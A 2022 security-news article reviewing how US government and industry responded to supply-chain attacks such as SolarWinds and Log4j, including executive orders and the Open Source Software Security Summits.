August 29, 2022 By Mike Elgan 3 min read

Major cyberattacks since 2019 jolted the U.S. government and software industry into action. The succeeding years have seen executive orders, new funding, two summits and a newfound resolve. Because of those attacks, the federal government aims to fix the open-source software security threat altogether. But what has really come of these efforts in the last few years?

The wake-up call

President Joe Biden issued two executive orders last year on cybersecurity,  one called Improving the Nation’s Cybersecurity and the other about supply chain security.

In the six months leading up to the executive order, the SolarWinds attack, a Microsoft Exchange Server attack and the Colonial Pipeline ransomware attack were all uncovered.

In December 2020, cybersecurity company FireEye (now Mandiant) revealed a massive and extremely sophisticated supply chain cyber attack launched by a nation-state via the SolarWinds Orion network management system (NMS). SolarWinds was the leading NMS in both business and government. FireEye’s disclosure was unique. They had not discovered the breach through detached research, but by being victimized by it. The subsequent list of victims was enormous.

Russian-government-backed APT 29 attackers (also known as Cozy Bear, UNC2452 and Nobelium) injected the SolarWinds’ software build environment with malware. This enabled attackers to gain access to the networks, systems and data of thousands of SolarWinds customers. Since then, it’s been described as the biggest attack in history. Tends of thousands of organizations use the software. To oversimplify how the attack worked, attackers breached SolarWinds’ networks in September of 2019. The next month, they injected malware called Sunburst into Orion, an IT performance monitoring system offered by SolarWinds. Then in March 2020, SolarWinds itself sent out Orion updates containing the malware.

Another attack, the Log4j vulnerability, also spurred action as a poster child for the threat of compromised supply chains and open-source vulnerabilities. Log4j is a popular Java library used for logging in applications. The attackers discovered a remote code execution vulnerability and other vulnerabilities. This lets them gain remote access to devices and applications for stealing data or deploying ransomware.

The summits

As a result, the National Security Council called a White House summit in January and a second in May. The initiative brought together more than 90 executives from 37 companies and government leaders in the Open Source Software Security Summit II on May 12. Participating companies included Atlassian, Cisco, Dell, Ericsson, GitHub, Google, IBM, Intel, Microsoft, SAP and others.

The purpose of the meeting, in brief, was threefold:

  • To reduce security vulnerabilities in open-source software
  • To boost the integration of security features in open-source software development tools
  • To speed up fixes.

In more detail, their goals included a comprehensive improvement of open-source security production and specific fixes.

Google Cloud committed during the meeting to the establishment of an Open Source Maintenance Crew. This team of engineers will collaborate with open-source coders to boost security. They also rolled out a new software supply chain dataset available to open-source developers.

At the May gathering, the Linux Foundation and Open Source Security Foundation unveiled a $150 million 10-point plan to improve open-source and supply chain security over the next two years. Other companies unveiled their own initiatives as well.

A long way yet to go

This massive industry effort is making progress, but we still have a long way to go. Some critics complain of inadequate time, money and staff.

By its very nature, the remedy advanced in the Open Source Software Security Summit II is multifaceted, complex, long-term and involves a huge number of players. After all, changing how people build open-source software takes time. Different organizations have different timelines, most of which are works in progress.

SolarWinds itself is revamping all its processes around security and is actively working with its customers to help them improve security.

A recent global survey of 1,000 chief information officers found that 82% say their organizations are still vulnerable to supply chain cyberattacks. However, a solid majority is implementing more security controls, updating review processes and expanding their use of code signing. More than 90% of supply chain-facing software applications use open-source components today.

Ongoing outcomes for an open-source world

In general, the U.S. government and businesses are making some progress. However, it’s too early to make a serious dent in open-source and supply chain vulnerabilities. As the government and the industry evolve to improve open-source security, the bad actors also evolve in response.

There’s room for hope, however. The recent high-profile cyberattacks, two Biden Administration executive orders and two security summits are truly lighting a fire under organizations public and private.

What’s needed now is renewed resolve, more funding and possibly more regulatory or industry action to respond to future attacks. Organizations also need to recognize what problems can leave them vulnerable. Acting fast could prevent the next SolarWinds attack.

More from Government

Updated SBOM guidance: A new era for software transparency?

3 min read - The cost of cyberattacks on software supply chains is a growing problem, with the average data breach costing $4.45 million in 2023. Since President Biden’s 2021 executive order, software bills of materials (SBOMs) have become a cornerstone in protecting supply chains.In December 2023, the National Security Agency (NSA) published new guidance to help organizations incorporate SBOMs and combat the threat of supply chain attacks.Let’s look at how things have developed since Biden’s 2021 order and what these updates mean for…

Roundup: Federal action that shaped cybersecurity in 2023

3 min read - As 2023 draws to a close, it’s time to look back on our top five federal cyber stories of the year: a compilation of pivotal moments and key developments that have significantly shaped the landscape of cybersecurity at the federal level.These stories highlight the challenges federal agencies faced in securing digital infrastructure in the past year and explore the evolving nature of cyber threats, as well as the innovative responses required to address them.New White House cybersecurity strategyThe White House’s…

ITG05 operations leverage Israel-Hamas conflict lures to deliver Headlace malware

12 min read - As of December 2023, IBM X-Force has uncovered multiple lure documents that predominately feature the ongoing Israel-Hamas war to facilitate the delivery of the ITG05 exclusive Headlace backdoor. The newly discovered campaign is directed against targets based in at least 13 nations worldwide and leverages authentic documents created by academic, finance and diplomatic centers. ITG05’s infrastructure ensures only targets from a single specific country can receive the malware, indicating the highly targeted nature of the campaign. X-Force tracks ITG05 as…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today